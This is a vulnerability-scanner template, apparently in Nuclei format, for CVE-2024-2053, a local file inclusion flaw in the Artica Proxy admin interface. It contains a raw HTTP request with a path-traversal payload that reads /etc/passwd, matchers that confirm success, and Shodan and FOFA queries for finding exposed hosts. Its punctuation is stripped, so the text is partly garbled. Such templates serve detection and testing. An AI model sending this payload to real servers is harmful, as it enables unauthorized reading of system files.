4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2024-2053.yaml YAML
id CVE-2024-2053

info
  name Artica Proxy  - Unauthenticated LFI
  author pussycat0x
  severity high
  description 
    The Artica Proxy administrative web application will deserialize arbitrary PHP objects supplied by unauthenticated users and subsequently enable code execution as the www-data user. This issue was demonstrated on version 4.50 of the The Artica-Proxy administrative web application attempts to prevent local file inclusion. These protections can be bypassed and arbitrary file requests supplied by unauthenticated users will be returned according to the privileges of the www-data user.
  reference
    - httpsgithub.com0xMarciocveblobmain2024CVE-2024-2053.md#cve-2024-2053
    - httpsseclists.orgfulldisclosure2024Mar11
    - httpskorelogic.comResourcesAdvisoriesKL-001-2024-001.txt
  classification
    cvss-metrics CVSS3.1AVNACLPRNUINSUCHINAN
    cvss-score 7.5
    cve-id CVE-2024-2053
    cwe-id CWE-23
    epss-score 0.00434
    epss-percentile 0.61897
    cpe cpe2.3aarticatechartica_proxy4.40
  metadata
    vendor articatech
    product artica_proxy
    shodan-query http.htmlartica
    fofa-query body=artica
    verified true
    max-request 1
  tags cve,cve2024,lfi,artica-proxy,articatech

http
  - raw
      - 
        GET images.listener.phpuri=1&mailattach=....................epasswdtcppasswdasswd HTTP1.1
        Host {{Hostname}}

    matchers-condition and
    matchers
      - type regex
        part body
        regex
          - root.00

      - type word
        part body
        words
          - applicationforce-download

      - type status
        status
          - 200
# digest 4b0a00483046022100d351bbabac086f868fb741bdc9c3af89b207275d3da6890f6c50ee1d9ee9f558022100ec130a0bb408129f780dcb68178a50c96512e734b619903c5bfb819a26e8a5f8922c64590222798bb761d5b6d8e72950